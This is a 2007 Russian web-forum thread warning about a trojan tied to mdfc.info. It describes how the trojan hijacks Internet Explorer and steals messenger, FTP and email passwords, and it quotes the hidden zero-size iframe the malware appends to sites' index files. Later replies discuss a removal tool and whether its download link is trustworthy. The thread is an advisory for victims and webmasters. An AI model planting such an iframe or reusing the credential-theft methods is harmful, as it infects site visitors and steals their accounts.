Большой Воронежский Форум
» Техническая поддержка>Вирусная эпидемия: Опасная инъекция в сайты от mdfc.info
BoBka 16:09 08.04.2007
http://forum.searchengines.ru/showthread.php?t=126831

Троянская программа, которая похищает конфиденциальную информацию пользователя. Является приложением Windows(PE-EXE файл). Размер компонентов троянца варьируется от 39 до 48 КБ.

Инсталляция

При запуске троянец извлекает из своего тела следующий файл:

%System%\msvcrl.dll - имеет размер 39 424 байта, упакован с помощью UPX.

Троянец получает путь к установленному Internet Explorer и изменяет файл iexplore.exe, добавляя в его таблицу импортов импорт из библиотеки

%System%\msvcrl.dll.

После чего троянская библиотека будет загружаться при каждом запуске Microsoft Internet Explorer.

При этом оригинальный файл троянца удаляется.

Деструктивная активность

Троянец похищает пароли на учетные записи из файлов данных следующих клиентов мгновенных сообщений:

QIP2005
Trillian
MSN Messenger
Yahoo Messenger
AOL
Miranda

Также троянец похищает пароли к FTP серверам из файлов конфигурации следующих FTP клиентов:

WS_FTP
Total Commander
CuteFTP
FAR

Похищает пароли к учетным записям электронной почты из файлов настроек следующих почтовых клиентов:

TheBat
Outlook Express
Outlook

Также троянец похищает словарь IE Auto Complete Fields.

Троянец устанавливает перехватчики на API функции для работы с сетью интернет:

InternetReadFile
InternetOpenURL

с помощью которых следит за посещаемыми пользователем Интернет сайтами. Также троян перехватывает отсылаемые Internet Explorer данные из полей ввода на web-формах.

Кроме того при открытии в Internet Explorer адресов, которые попадают в заложенный внутрь троянца список, троян осуществляет перенаправление запросов на сайты злоумышленника.

Собранную на компьютере пользователя информацию троянец отправляет на сайт злоумышленника в параметрах HTTP запроса.


Нашел рекомедацию:

Скачайте Haxfix (http://users.telenet.be/marcvn/tools/haxfix.exe) и установите, после запуска из меню выберите 2. Run auto fix

Соответственно, прога выдала, что IE заражен, и указала, где на компе есть старая чистая копия. Зараженную убил, архивную поставил. IE снова работает


на сервере он трограет файлы index.* и если нет создает свой index.html
в файлах в конце вставляет:

<!-- ~ --><iframe width="0" height="0" src="http://mdfc.info"></iframe><!-- ~ -->

обновите анетивирусные базы, проверьтесь, это серьезно... сообщают много сайтов нагнулось (вирь свежий)

p.s.: за своевременную инфу спасибо pthah[Ответ]
alexmaster777 16:52 08.04.2007

Сообщение от BoBka:
будет загружаться при каждом запуске Microsoft Internet Explorer

Какого? 7го? любого? кто им вообще пользуется? Мне не актуально. Троян слабенький! [Ответ]
BoBka 17:08 08.04.2007

Сообщение от alexmaster777:
Какого? 7го? любого?

sp1 sp2
пользуются хотябы веб мастеры для теста сайта [Ответ]
Миша Ложкин 17:42 08.04.2007
Не знал, что у кого-то ещё есть Microsoft Internet Explorer. [Ответ]
The Vov@N 23:17 16.04.2007

Сообщение от :
Worm.Win32.Vasor.17400

Помогите плиз, как избавиться от этой гадости, кто подскажет....?
Не ужели только форматирование от него помогает? [Ответ]
KonstantinVoskr 03:13 17.04.2007

Сообщение от The Vov@N:
Помогите плиз, как избавиться от этой гадости, кто подскажет....?
Не ужели только форматирование от него помогает?

мене прислали в асю-типа классные обои-я полез-а мен кис ругнулся чт овирус(этот )и сразу пресек все что нужно)потом из кеша все выстегнул и все ок-вирей нету [Ответ]
ilya1 07:19 26.04.2007

Сообщение от BoBka:
Скачайте Haxfix (http://users.telenet.be/marcvn/tools/haxfix.exe) и установите, после запуска из меню выберите 2. Run auto fix

Бу-га-га, качайте устанавливайте. Мне тоже и в асю и в мыло патчеры подобные постоянно кидают.
P.S. Имеено этот файл не качал не ковырял, но я думаю и так все понятно. [Ответ]
builder 07:29 26.04.2007
Сам по себе haxfix (скачаный с нормального сайта) закладок не имеет и реально убивает вредную заразу. [Ответ]
BoBka 10:34 26.04.2007
ну, можно тогда всегда юзать оперу без java-машины и все будет пучком [Ответ]
Вверх